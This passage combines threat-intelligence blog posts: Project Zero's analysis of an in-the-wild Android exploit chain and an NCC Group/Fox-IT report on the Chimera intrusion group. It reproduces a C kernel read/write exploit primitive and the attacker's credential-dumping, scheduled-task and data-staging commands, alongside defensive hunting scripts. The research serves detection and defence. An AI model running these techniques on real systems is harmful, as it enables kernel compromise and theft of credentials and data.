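    int fd = mkstemp(path);
    if (fd < 0)
      return -1;
    write(fd, buf, len);
    fchmod(fd, mode);                      /* 4th argument: permissions */
    setxattr(path, "security.selinux", selabel,
             strlen(selabel) + 1, 0);      /* 5th argument: SELinux label */
    close(fd);
    return 0;
  }
  return -1;
}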

The following section gives a simplified summary of how the response from the C2 server is handled based on the response’s message code:

  • 0x270F: Return 0.
  • 0x2710: The response is a shared library ELF (ET_DYN). Call func2 to fork a child process and inject the ELF using ptrace.
  • 0x2711: The response is a shared library ELF (ET_DYN). Save the file to a temp file on the device and then call dlopen and dlsym(“init”) on the ELF. A child process is then forked. The child process calls init.
  • 0x2712: The response is an ELF file. The file is written to a temporary file on the device. A child process is forked and that child process executes by calling execve on the file.
  • 0x2713: The response is an ELF file.  The file is written to a temporary file on the device using func3. A child process is forked and that child process executes it by calling system on the file.
  • 0x2714: It forks a child process and that child process calls system(<response contents>).
  • 0x2715: The response is executable code and is mmaped. Certain series of bytes are replaced by the address of dlopen, dlsym, and a function in the binary. Then the code is executed.
  • 0x4E20: If (D1_ENV == 0 && the code can NOT fstat /data/dalvik-cache/arm/system@[email protected]), go into an infinite sleep. Else, set a variable to 1.
  • 0x4E21: The response/buffer is an ELF with type ET_DYN (.so file). If D1_ENV environment variable is set, call func2, which spawns the child process and injects the buffer’s code into it using ptrace. If D1_ENV is not set, write the buffer to the dalvik-cache and /mnt directories through func1.
  • 0x4E22: This message increments the “uninstall_time” variable in the hashtable. For the value that is at key 0xA0 in the hashtable, it will increment it by the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E23: This message sets the “uninstall_time” variable in the hashtable. It will set the value at key 0xA0 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E25: Set the value at the key 0x100 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E26: If the third argument (filepath) to the function that is processing these responses is not NULL and it doesn’t previously exist, make the directory and then set the file permissions and SELinux attributes on the directory to the values passed in as the 4th and 5th arguments.
  • 0x4E27: Write the response buffer to a temporary file using func3.
  • 0x4E28: Call rmdir on a filepath.
  • 0x4E29: Call rmdir on a filepath, if it doesn’t exist delete uierrors.txt.
  • 0x4E2A: Copy an additional decrypted block to the end of the data that is the value for key 0xE0 in the hash table.
  • 0x4E2B: If (D1_ENV == 0 && we can fstat /data/dalvik-cache/arm/system@[email protected]), set certain variables to 1.
  • 0x4E2C: If the buffer is a 64-bit ELF and D1_ENV == 0, call func1 to write the buffer to the dalvik-cache and /mnt directories.

Conclusion

That concludes our analysis of Stage 3 in the Android exploit chain. We hypothesize that each Stage 2 (and thus Stage 3) includes different configuration variables that would allow the attackers to identify which delivered exploit chain is calling back to the C2 server. In addition, due to the detailed information sent to the C2 prior to stage 4 being returned to the device it seems unlikely that we would successfully determine the correct values to have a “legitimate” stage 4 returned to us.

It’s especially fascinating how complex and well-engineered this stage 3 code is when you consider that the attackers used only publicly known n-days in stage 2. The attackers used a Google Chrome 0-day in stage 1, public exploits for Android n-days in stage 2, and a mature, complex, and thoroughly designed and engineered stage 3. This leads us to believe that the actor likely has more device-specific 0-day exploits.

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 6: Windows Exploits.

In-the-Wild Series: Android Exploits

By: Ryan
12 January 2021 at 17:37

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mark Brand, Project Zero

A survey of the exploitation techniques used by a high-tier attacker against Android devices in 2020

Introduction

After one of the Chrome exploits has been successful, there are several (quite simple) stages of payload decryption that occur. Once we've got through that, we reach a much more complex binary that is clearly the result of some engineering work. Thanks to that engineering it's very simple for us to locate and examine the exploits embedded inside! For each privilege elevation, they have a function in the .init_array which will register it into a global list which they later use -- this makes it easy for them to plug-and-play additional exploits into their framework, but is also very convenient for us when reverse-engineering their framework.

Each of the "xyz_register" functions adds an entry to the global list with a probe function used to check whether the device is vulnerable to the given exploit and to estimate the likelihood of success, and an exploit function used to launch the exploit. These probe functions are then used to dynamically determine the best exploit to use based on runtime information about the target device.

Looking at the probe functions gives us an idea of which devices are supported, but we can already see something fairly surprising: this attacker is using entirely public exploits for their privilege elevations. Of course, we can't tell for sure that they didn't know about any of these bugs prior to the original public disclosures; but their exploit configuration structure contains an internal "name" describing the exploit, and those map very neatly to either public naming ("iovy", "cow") or CVE numbers ("0569", "0820" for exploits targeting CVE-2015-0569 and CVE-2016-0820 respectively), suggesting that these exploits were very likely developed after those public disclosures and not before.

In addition, as we'll see below, most of the exploits are closely related to public exploits or descriptions of techniques used to exploit the bugs -- adding further weight to the theory that these exploits were implemented well after the original patches were shipped.

Of course, it's important to note that we had a narrow window of opportunity during which we were capturing these exploit chains, and it wasn't possible for us to exhaustively test with different devices and patch levels. It's entirely possible that this attacker also has access to Android 0-day privilege elevations, and we just failed to extract those from the server before being detected. Nonetheless, it's certainly an interesting data-point to see an attacker pairing a sophisticated 0-day exploit for Chrome with, well, a load of bugs patched between 2 and 5 years ago.

Anyway, without further ado let's take a look at the exploits they did fit in here!

Common Techniques

addr_limit pipe kernel read-write: By corrupting the addr_limit variable in the task_struct, this technique gives a user-mode process the ability to read and write arbitrary kernel memory by passing kernel pointers when reading to and writing from a pipe.
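This primitive is publicly documented; a common shape for it looks like the following sketch, assuming addr_limit has already been corrupted to cover kernel space and kfd is a pipe created afterwards:

#include <unistd.h>

static int kfd[2]; /* pipe(kfd) called once after corrupting addr_limit */

/* with addr_limit gone, copy_to/from_user no longer rejects kernel
   pointers, so read()/write() on the pipe move kernel memory */
void kernel_read(unsigned long kaddr, void *buf, size_t len) {
  write(kfd[1], (void *)kaddr, len); /* kernel memory -> pipe */
  read(kfd[0], buf, len);            /* pipe -> user buffer   */
}

void kernel_write(unsigned long kaddr, const void *buf, size_t len) {
  write(kfd[1], buf, len);           /* user buffer -> pipe   */
  read(kfd[0], (void *)kaddr, len);  /* pipe -> kernel memory */
}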

Userspace shellcode: PXN support on 32-bit Android devices is quite rare, so on most 32-bit devices it was/is still possible to directly execute shellcode from the user-mode portion of the address space. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

Point to userspace memory: PAN support is not ubiquitous on 64-bit Android devices, so it was (on older Android versions) often possible even on 64-bit devices for a kernel exploit to use this technique. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

iovy

The vulnerabilities:

CVE-2015-1805 is a vulnerability in the Linux kernel handling read/write for pipe iovectors, leading to the use of an out-of-bounds struct iovec.

CVE-2016-3809 is an information leak, disclosing the address of a kernel sock structure.

Strategy: Heap-spray with fake iovectors using sendmmsg, race write, readv and mmap/munmap to trigger the vulnerability. This produces a single-use kernel write-what-where.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then corrupt the socket member of the sock structure to point to userspace memory containing a fake structure (and function pointer table); execute userspace shellcode, elevating privileges.

Copy/Paste: ~90%. The exploit strategy is the same as public exploit code, and it looks like this was used as a starting point. The authors did some additional work, presumably to increase portability and stability, and the subsequent flow doesn't match any existing public exploit (that I found), but all of the techniques are publicly known.


Additional References: KEEN Lab "Talk is Cheap, Show Me the Code".

iovy_pxn2

The vulnerabilities: Same as iovy, plus:
P0-822 is an information leak, allowing the reading of arbitrary kernel memory.

Strategy: Same as above.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, and use P0-822 to leak the address of the function pointer table associated with the socket. Then use P0-822 again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~70%. The exploit strategy is the same as above, building the same primitive as the public exploit (addr_limit pipe kernel read-write). Instead of the public approach, they leverage the two additional vulnerabilities, which had public code available. It seems like the development of this exploit was copy/paste integration of the alternative memory-leak primitives, probably to increase portability. The code used for P0-822 is a direct copy-paste.

iovy_pxn3

The vulnerabilities: Same as iovy.

Strategy: Heap-spray with pipe buffers. One thread each for read/write/readv/writev and the usual mmap/munmap thread. Modify all of the pipe buffers, and then run either "read and writev" or "write and readv" threads to get a reusable kernel read-write.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then use kernel-read to leak the address of the function pointer table associated with the socket. Use kernel-read again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~30%. The heap-spray technique is the same as another public exploit, but there is significant additional synchronization added to support multiple reads and writes. There's not really enough unique commonality to determine whether the authors started with that code as a reference or not.

0569

The vulnerability: According to the release notes, CVE-2015-0569 is a heap overflow in Qualcomm's wireless extension IOCTLs. This appears to be where the exploit name is derived from; however as you can see at the Qualcomm advisory, there were actually 15 commits here under 3 CVEs, and the exploit appears to actually target one of the stack overflows, which was patched as CVE-2015-0570.

Strategy: Corrupt return address; return to userspace shellcode.

Subsequent flow: The shellcode corrupts addr_limit, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: 0%. This bug is trivial to exploit for non-PXN targets, so there would be little to gain by borrowing code.

Additional References: KEEN Lab "Rooting every Android".

0820

The vulnerability: CVE-2016-0820, a linear data-section overflow resulting from a lack of bounds checking.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the KEEN Lab presentation.

Copy/Paste: ~20%. The only public code we could find for this is the PoC attached to our bugtracker - it seems most likely that this was an independent implementation written after KEEN lab's presentation and based on their description.

Additional References: KEEN Lab "Rooting every Android".

COW

The vulnerability: CVE-2016-5195, also known as DirtyCOW.

Strategy: Depending on the system configuration their exploit will choose between using /proc/self/mem or ptrace for the write thread.

Subsequent flow: There are several different exploitation strategies depending on the target environment, and the full exploitation process here is a fairly complex state-machine involving several hops into different processes, which is likely necessary to support launching the exploit from within an isolated app context.

Copy/Paste: ~5%. The basic code necessary to exploit CVE-2016-5195 was probably copied from one of the many public sources, but the majority of the complexity here is in what is done next, and this doesn't seem to be similar to any of the public Android exploits.

9568

The vulnerability: CVE-2018-9568, also known as WrongZone.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the Baidu Security Lab blog post.

Copy/Paste: ~20%. The code doesn't seem to match the publicly available exploit code for this bug, and it seems most likely that this was an independent implementation written after Baidu's blog post and based on their description.

Additional References: Alibaba Security "From Zero to Root". 
Baidu Security Lab: "KARMA shows you offense and defense".

Conclusion

Nothing very interesting, which is interesting in itself!

Here is an attacker who has access to 0day vulnerabilities in Chrome and Windows, and the ability to develop new and very reliable exploitation techniques in order to exploit these vulnerabilities -- and yet their Android privilege elevation capabilities appear to consist entirely of exploits using public, documented techniques and n-day vulnerabilities.

It certainly seems like they have the capability to write Android exploits. The exploits seem to be based on publicly available source code, and their implementations are based on exploitation strategies described in public sources.

One explanation for this would be that they serve different payloads depending on the targeting, and we were only receiving a "low-value" privilege-elevation capability. Alternatively, perhaps the exploit server URLs that we had access to were specifically configured for a user that they knew used an older device that would be vulnerable to one of these exploits?

Based on all the information available, it's likely that they have more device-specific 0day exploits. We might just not have tested with a device/firmware version that they supported for those exploits and inadvertently missed their more modern exploits.

About the only solid conclusion that we can make is that attackers clearly still see value in developing and maintaining exploits for fairly old Android vulnerabilities, to the extent of supporting those devices long past when their original manufacturers provide support for them.

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 5: Android Post-Exploitation.

Abusing cloud services to fly under the radar

12 January 2021 at 13:53

tl;dr

NCC Group and Fox-IT have been tracking a threat group with a wide set of interests, from intellectual property (IP) from victims in the semiconductors industry through to passenger data from the airline industry.

In their intrusions they regularly abuse cloud services from Google and Microsoft to achieve their goals. NCC Group and Fox-IT observed this threat actor during various incident response engagements performed between October 2019 and April 2020. Our threat intelligence analysts noticed clear overlap between the various cases in infrastructure and capabilities, and as a result we assess with moderate confidence that one group, operating in Chinese interests, was carrying out the intrusions across multiple victims.

In open source this actor is referred to as Chimera by CyCraft.

NCC Group and Fox-IT have seen this actor remain undetected for dwell times of up to three years. As such, if you were a victim, they might still be active in your network looking for your most recent crown jewels.

We contained and eradicated the threat from our client’s networks during incident response whilst our Managed Detection and Response (MDR) clients automatically received detection logic.

With this publication, NCC Group and Fox-IT aim to provide the wider community with information and intelligence that can be used to hunt for this threat in historic data and improve detections for intrusions by this intrusion set.

Throughout, we use the terminology standardized by MITRE in their ATT&CK framework to describe the various phases, tactics, and techniques of the intrusions. Near the end of this article, all the tactics and techniques used by the adversary are listed with links to the MITRE website for more information.

From initial access to defense evasion: how it is done

All the intrusions we have observed were performed in similar ways by the adversary, from initial access all the way to actions on objectives. The objective in these cases appears to be stealing sensitive data from the victims' networks.

Credential theft and password spraying to Cobalt Strike

This adversary starts with obtaining usernames and passwords of their victim from previous breaches. These credentials are used in a credential stuffing or password spraying attack against the victim's remote services, such as webmail or other internet-reachable mail services. After obtaining a valid account, they use it to access the victim's VPN, Citrix, or another remote service that allows access into the victim's network. Information regarding these remote services is taken from the mailbox, cloud drive, or other cloud resources accessible to the compromised account.

As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system and attempt to obtain a list of accounts with administrator privileges. With this list of administrator accounts, the adversary performs another password spraying attack until a valid admin account is compromised. With this valid admin account, a Cobalt Strike beacon is loaded into the memory of patient zero. From here on, the adversary stops using the victim's remote service to access the network, and uses the Cobalt Strike beacon for remote access and command and control.

Network discovery and lateral movement

The adversary continues their discovery of the victim's network from patient zero. Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. If the obtained valid account is already a member of the domain admins group, the first lateral move in the network is usually to a domain controller, where the adversary also deploys a Cobalt Strike beacon. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon. After this, the adversary dumps the domain admin credentials from the memory of this machine, continues moving laterally through the network, and places Cobalt Strike beacons on servers for increased persistent access into the victim's network. If the victim's network contains other Windows domains or different network security zones, the adversary scans for and finds the trust relationships and jump hosts, and attempts to move into the other domains and security zones. The adversary is typically able to perform all the steps described above within one day.

During this process, the adversary identifies data of interest from the victim's network. This can be anything from file and directory listings, configuration files, and manuals, to email stores in the form of OST and PST files, file shares with intellectual property (IP), and personally identifiable information (PII) scraped from memory. If the data is small enough, it is exfiltrated through the command and control channel of the Cobalt Strike beacons. Usually, however, the data is compressed with WinRAR, staged on another system of the victim, and from there copied to a OneDrive account controlled by the adversary.

After the adversary completes their initial exfiltration, they return every few weeks to check for new data of interest and new user accounts. At times they have been observed performing a degree of anti-forensic activity, including clearing event logs, time stomping files, and removing scheduled tasks created for some objectives, but this isn't done consistently across their engagements.

Framing the adversary’s work in the MITRE ATT&CK framework

Credential access (TA0006)

The earliest and longest-lasting intrusion by this threat that we observed was at a company in the semiconductors industry in Europe, and started early in Q4 2017. The more recent intrusions took place in 2019 at companies in the aviation industry. The techniques used to gain access at the companies in the aviation industry closely resemble those used against victims in the semiconductors industry.

The threat used valid accounts against remote services: cloud-based applications utilizing federated authentication protocols. Our incident responders analysed the credentials used by the adversary and the traces of the intrusion in log files. They uncovered an obvious overlap between the credentials used by this threat and the presence of those same accounts in previously breached databases. Besides that, the log files showed more login attempts than usual with usernames formatted as email addresses, e.g. <username>@<email domain>, while usernames for legitimate logins at the victim's network were generally formatted as <domain>\<username>. Attempted logins also came from a relatively small set of IP addresses.

For the investigators at NCC Group and Fox-IT these pieces of evidence supported the hypothesis of the adversary achieving credentials access by brute force, and more specifically by credential stuffing or password spraying.
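
That hypothesis can be tested mechanically. Below is a minimal hunting sketch, assuming authentication logs have already been exported to a CSV with hypothetical source_ip, username, and result columns; the threshold is a tuning knob, not a rule:

import csv
from collections import defaultdict

# A spraying source tries many distinct accounts, each only a few times.
tried = defaultdict(set)

with open("auth_log.csv", newline="") as f:  # hypothetical log export
    for row in csv.DictReader(f):
        if row["result"] == "failure":
            tried[row["source_ip"]].add(row["username"].lower())

for ip, users in sorted(tried.items(), key=lambda kv: -len(kv[1])):
    if len(users) > 20:  # tuning threshold, not a rule
        # Email-formatted usernames were one of the anomalies described above.
        emailish = sum("@" in u for u in users)
        print(f"{ip}: {len(users)} distinct usernames ({emailish} email-formatted)")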

Initial access (TA0001)

In some of the intrusions the adversary used the valid account to directly login to a Citrix environment and continued their work from there.

In one specific case, the adversary, now armed with the valid account, was able to access a document stored in SharePoint Online, part of Microsoft Office 365. This specific document described how to access the internet-facing company portal and the web-based VPN client into the company network. Within an hour of grabbing this document, the adversary accessed the company portal with the valid account.

From this portal it was possible to launch the web-based VPN. The VPN was protected by two-factor authentication (2FA): an SMS with a one-time password (OTP) was sent to the user account's primary or alternate phone number. The company portal allowed the logged-in user to configure an alternate phone number, and the adversary used this opportunity to configure an alternate phone number under their control.

By intercepting the two-factor authentication (receiving the OTP on their own telephone number), they gained access to the company network via the VPN. In one incident, however, they made a mistake during this process. Our hypothesis is that they tested the 2FA system first, or selected the primary phone number to send the SMS to: the European owner of the account received a text message with Simplified Chinese characters on the primary phone number in the middle of the night, Eastern European Time (EET). NCC Group and Fox-IT identified that the language of the 2FA text message is based on the web browser's language settings used during the authentication flow; thus the 2FA code was sent with supporting Chinese text.

Account discovery (T1087)

With access to the victim's network, the adversary finds a way to install a Cobalt Strike beacon on one of its systems (see Execution). But before doing so, we observed the adversary checking the current permissions of the obtained user account with the following commands:

net user
net user Administrator
net user <username> /domain
net localgroup administrators

If the user account doesn't have local or domain administrative permissions, the adversary attempts to discover which local or domain admin accounts exist, and exfiltrates those admins' usernames. To identify whether privileged users are active on remote servers, the adversary makes use of PsLogList from Microsoft Sysinternals to retrieve the Security event logs. The built-in Windows quser command to show logged-on users is also heavily used. If such a privileged user was recently active on a server, the adversary executes Cobalt Strike's built-in Mimikatz to dump their password hashes.
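
Defenders can hunt for the same signal. A minimal sketch follows, assuming Security event log entries (e.g. a PsLogList dump or another export) have been normalised into a CSV with hypothetical time, computer, event_id, logon_type, and target_user columns; the account list is illustrative:

import csv

ADMINS = {"administrator", "svc_backup"}  # hypothetical privileged accounts
INTERACTIVE = {"2", "10"}  # console (2) and RDP (10) logon types

with open("security_events.csv", newline="") as f:  # hypothetical normalised export
    for row in csv.DictReader(f):
        # 4624 = successful logon; interactive logons leave credentials in LSASS.
        if (row["event_id"] == "4624"
                and row["logon_type"] in INTERACTIVE
                and row["target_user"].lower() in ADMINS):
            print(f'{row["time"]}: privileged logon by {row["target_user"]} on {row["computer"]}')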

Privilege escalation (TA0004)

The adversary then started a password spraying attack against those domain admin accounts, and successfully obtained a valid domain admin account this way. In other cases, the adversary moved laterally to another system with a domain admin logged in. We observed the use of Mimikatz on such a system and saw the hashes of the logged-in domain admin account going through the adversary's command and control channel. The adversary also used a tool called NtdsAudit to dump the password hashes of domain users; we observed the following command:

msadcs.exe "NTDS.dit" -s "SYSTEM" -p RecordedTV_pdmp.txt --users-csv RecordedTV_users.csv

Note: the adversary renamed ntdsaudit.exe to msadcs.exe.

But we also observed the adversary using the tool ntdsutil to create a copy of the Active Directory database NTDS.dit followed by a repair action with esentutl to fix a possible corrupt NTDS.dit:

ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\tmp" q q
esentutl /p /o ntds.dit

Both ntdsutil and esentutl are by default installed on a domain controller.
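
Both commands leave characteristic command lines behind, which makes them a worthwhile hunting target. A minimal sketch, assuming process-creation telemetry (e.g. Sysmon Event ID 1 or Windows Event ID 4688) has been exported to a CSV with hypothetical time, host, and command_line columns:

import csv

# Command-line fragments characteristic of NTDS.dit dumping and repair.
SUSPICIOUS = [
    ("ntdsutil", "ifm"),  # "install from media" copy of the AD database
    ("esentutl", "/p"),   # repair of a (copied) ntds.dit
]

with open("process_creation.csv", newline="") as f:  # hypothetical telemetry export
    for row in csv.DictReader(f):
        cmd = row["command_line"].lower()
        for exe, marker in SUSPICIOUS:
            if exe in cmd and marker in cmd:
                print(f'{row["time"]} {row["host"]}: {row["command_line"]}')
                break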

A tool used by the adversary which wasn't installed on the servers by default was DSInternals. DSInternals is a PowerShell module that makes use of internal Active Directory features. The files and directories found on various systems of a victim match DSInternals version 2.16.1. We found traces indicating when DSInternals was executed, and these timestamps match the rest of the traces of the intrusion. We haven't recovered traces of how the adversary used DSInternals, but considering the phase of the intrusion in which the tool was used, it is likely they used it for account discovery, privilege escalation, or both.

Execution (TA0002)

During the intrusion the adversary installs a hacker's best friend: Cobalt Strike. Cobalt Strike is a framework designed for adversary simulation, intended for penetration testers and red teams. It has been widely adopted by malicious threat actors as well.

The Cobalt Strike beacon is installed in memory by using a PowerShell one-liner. At least the following three versions of Cobalt Strike have been in use by the adversary:

  • Cobalt Strike v3.8, observed Q2 2017
  • Cobalt Strike v3.12, observed Q3 2018
  • Cobalt Strike v3.14, observed Q2 2019

Fox-IT has been collecting information about Cobalt Strike team servers since January 2015. This research project covers the fingerprinting of Cobalt Strike servers and is described in the Fox-IT blog "Identifying Cobalt Strike team servers in the wild". The collected information allows Fox-IT to correlate Cobalt Strike team servers based on various configuration settings. Because of this, historic information was available during this investigation. Whenever a Cobalt Strike C2 channel was identified, Fox-IT performed lookups in the collection database. If a match was found, the configuration of the Cobalt Strike team server was analysed. This configuration was then compared against the other Cobalt Strike team servers to check for similarities in, for example, domain names, version numbers, URLs, and various other settings.
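
The comparison itself can be as simple as scoring the overlap between configuration settings. A minimal sketch of the idea, with hypothetical, simplified setting names and values (not the actual Fox-IT tooling):

def config_overlap(a: dict, b: dict) -> float:
    # Jaccard similarity over the (setting, value) pairs of two team server configs.
    pa, pb = set(a.items()), set(b.items())
    return len(pa & pb) / len(pa | pb)

# Hypothetical, simplified team server configurations.
known = {
    "teamserver-A": {"version": "3.12", "beacon_uri": "/jquery-3.3.2.min.js", "port": "443"},
    "teamserver-B": {"version": "4.0", "beacon_uri": "/updates", "port": "8080"},
}
new = {"version": "3.14", "beacon_uri": "/jquery-3.3.2.min.js", "port": "443"}

for name, cfg in known.items():
    score = config_overlap(cfg, new)
    print(f"{name}: {score:.2f}")  # high scores hint at the same operator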

The adversary relies heavily on scheduled tasks that execute a batch file (.bat) to perform their work. An example of the creation of such a scheduled task by the adversary:

schtasks /create /ru "SYSTEM" /tn "update" /tr "cmd /c c:\windows\temp\update.bat" /sc once /f /st 06:59:00

The batch-files appear to be used to load the Cobalt Strike beacon, but also to perform discovery commands on the compromised system.

Persistence (TA0003)

The adversary loads the Cobalt Strike beacon in memory, without any persistence mechanism on the compromised system. Once the system is rebooted, the beacon is gone. The adversary nevertheless retains persistent access by installing the beacon on systems with high uptimes, such as servers. Besides using the Cobalt Strike beacon, the adversary also searches for VPN and firewall configurations, possibly to serve as backup access into the network. We haven't seen the adversary use those access methods after the first Cobalt Strike beacons were installed, perhaps because it was never necessary.

After the first bulk of data is exfiltrated, the persistent access into the victim’s network is periodically used by the adversary to check if new data of interest is available. They also create a copy of the NTDS.dit and SYSTEM-registry hive file for new credentials to crack.

Discovery (TA0007)

The adversary applied a wide range of discovery tactics. In the list below we have highlighted a few specific tools the adversary used for discovery purposes. You can find a summary of most of the commands used by the adversary to perform discovery at the end of this article.

Account discovery tool: PsLogList
Command used:

psloglist.exe -accepteula -x security -s -a <date>

This command exports the contents of the Security event log after the specified date to a text file with comma-separated fields.

Psloglist is part of the Sysinternals toolkit from Mark Russinovich (Microsoft). The tool was used by the adversary on various systems to write events from the Windows Security event log to a text file. A possible intent could be to identify whether privileged users are active on the systems. If such a privileged user was recently active on a server, the actor executes Cobalt Strike's built-in Mimikatz to dump their credentials or password hash.

Account discovery tool: NtdsAudit
Command used:

msadcs.exe "NTDS.dit" -s "SYSTEM" -p RecordedTV_pdmp.txt --users-csv RecordedTV_users.csv

It imports the specified Active Directory database NTDS.dit and registry file SYSTEM, exports the recovered password hashes into RecordedTV_pdmp.txt, and writes user details to RecordedTV_users.csv.

The NtdsAudit utility is an auditing tool for Active Directory databases. It allows the user to collect useful statistics related to accounts and passwords. The utility was found on various systems of a victim and matches the NtdsAudit.exe program file version v2.0.5 published on the GitHub project page.

Network service scanning
Command used:

get -b <start ip> -e <end ip> -p
get -b <start ip> -e <end ip>

Get.exe appears to be a custom tool used to scan IP ranges for HTTP service information. NCC Group and Fox-IT decompiled the tool for analysis. This showed the tool was written in the Python scripting language and packed into a Windows executable. Though Fox-IT didn't find any direct occurrences of the tool on the internet, the decompiled code showed strong similarities with the source code of a tool named GetHttpsInfo, a reconnaissance tool that scans an internal network range for HTTP and HTTPS services.

The tool was shared on a Chinese forum around 2016.

Figure 1: Example of a download location for GetHttpsInfo.exe

Lateral movement (TA0008)

The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons on newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. The adversary attempts to move to a domain controller as soon as possible after gaining a foothold in the victim's network. They continue lateral movement and discovery in an attempt to identify the data of interest: this could be a webserver to carve PII from memory, or a fileserver to copy IP; we have observed both.

At one customer, the data of interest was stored in a separate security zone. The adversary found a dual-homed system and compromised it, then used it as a jump host into the higher security zone and started collecting the intellectual property stored on a file server in that zone.

In one event we saw the adversary compromise a Linux system through SSH. The user account was possibly compromised by credential stuffing or password spraying: log files on the Linux system show traces that can be attributed to such an attack.

Lateral tool transfer (T1570)

The adversary applies living-off-the-land techniques very well, incorporating default Windows tools into their arsenal. But not all tools used by the adversary are so-called LOLBins: as said before, they use Cobalt Strike, and they also rely on custom tools for network scanning (get.exe), carving data from memory, compressing data, and exfiltrating data.

But first: how did they get the tools onto the victim's systems? The adversary copied them over SMB from compromised system to compromised system, wherever the tools were needed. A few examples of commands we observed:

copy get.exe \\<ip>\c$\windows\temp\
copy msadc* \\<hostname>\c$\Progra~1\Common~1\System\msadc\
copy update.exe \\<ip>\c$\windows\temp\
move ak002.bat \\<ip>\c$\windows\temp\update.bat

Collection (TA0009)

In preparation for exfiltration, the adversary collected the data needed for their objective from various sources within the victim's network. As described before, the adversary collected data from an information repository, Microsoft SharePoint Online in this case: the document retrieved there was exfiltrated and used to continue the intrusion via the company portal and VPN.

In all cases we've seen the adversary copy the results of the discovery phase, such as file and directory listings, from local systems, network shared drives, and file shares on remote systems. But email collection is also important for this adversary: in every intrusion we saw the mailboxes of certain users being copied, from both local and remote systems:

wmic /node:<ip> process call create "cmd /c copy c:\Users\<username>\<path>\backup.pst c:\windows\temp\backup.pst"
copy "i:\<path>\<username>\My Documents\<filename>.pst"
copy \\<hostname>\c$\Users\<username>\AppData\Local\Microsoft\Outlook*.ost

Files and folders of interest are collected as well and staged for exfiltration.

The goal of targeting some victims appears to be to obtain Passenger Name Records (PNR). How this PNR data is obtained likely differs per victim, but we observed several custom DLL files used to continuously retrieve PNR data from the memory of systems where such data is typically processed, such as flight booking servers.

The DLLs used were side-loaded in memory on compromised systems. After placing a DLL in the appropriate directory, the actor would change the date and time stamps of the DLL files to blend in with the other, legitimate files in the directory.

Adversaries aiming to exfiltrate large amounts of data will often use one or more systems or storage locations for intermediate storage of the collected data. This process is called staging, and it is one of the activities that NCC Group and Fox-IT have observed in the analysed C2 traffic.

We've seen the adversary stage data on a remote system or on the local system. Most of the time, the data is compressed and copied in a single step. Only a handful of times did the adversary copy the data first and then compress (archive collected data) and exfiltrate it. The adversary compresses and encrypts the data using WinRAR from the command line; the command-line executable for WinRAR is named RAR.exe by default.

This activity group always uses a renamed version of rar.exe. We have observed the following filenames overlapping all intrusions:

  • jucheck.exe
  • RecordedTV.ms
  • teredo.tmp
  • update.exe
  • msadcs1.exe

The adversary typically places the executables in the following folders:

  • C:\Users\Public\Libraries\
  • C:\Users\Public\Videos\
  • C:\Windows\Temp\

We have observed the following four variants of the use of rar.exe (renamed to update.exe):

update a -m5 -hp<password> <target_filename> <source>
update a -m5 -r -hp<password> <target_filename> <source>
update a -m5 -inul -hp<password> <target_filename> <source>
update a -m5 -r -inul -hp<password> <target_filename> <source>

The command-line parameters have the following effect:

  • a = add to archive.
  • m5 = use compression level 5.
  • r = recurse subfolders.
  • inul = suppress error messages.
  • hp<password> = encrypt both file data and headers with password.

The password used and the file extensions given to the staged data differ per intrusion. We've seen the use of .css, .rar, .log.txt, and no extension at all for staged pieces of data.
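
Because the archives are renamed, hunting by extension alone misses them; content-based checks do better. A minimal sketch that sweeps the staging folders named above for files carrying the RAR signature under a different name:

import os

RAR_MAGIC = b"Rar!\x1a\x07"  # common prefix of the RAR4 and RAR5 signatures

STAGING_DIRS = [r"C:\Users\Public\Libraries", r"C:\Users\Public\Videos", r"C:\Windows\Temp"]

for base in STAGING_DIRS:
    for root, _dirs, files in os.walk(base):
        for name in files:
            path = os.path.join(root, name)
            try:
                with open(path, "rb") as fh:
                    header = fh.read(len(RAR_MAGIC))
            except OSError:
                continue  # locked or unreadable file
            # RAR content behind a non-.rar name is a staging candidate.
            if header == RAR_MAGIC and not name.lower().endswith(".rar"):
                print("possible staged archive:", path)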

After compromising a host running a Linux operating system, data is compressed as well, this time as a gzipped tar file (.tar.gz). Sometimes no file extension is used, or the extension is .il. Most of the time the file names are prefixed with adsDL_ or contain the word "list". The files are staged in the home folder of the compromised user account: /home/<username>/

Command and control (TA0011)

The adversary uses Cobalt Strike as the framework to manage their compromised systems. We observed the adversary using Cobalt Strike's C2 protocol encapsulated in DNS in 2017 and 2018; they switched to C2 encapsulated in HTTPS in Q3 2019. An interesting observation is that they made use of a cracked/patched trial version of Cobalt Strike. This is important to note because the functionality of Cobalt Strike's trial version is limited. More importantly, the trial version doesn't encrypt command and control traffic in cases where the protocol itself isn't encrypted, such as DNS.

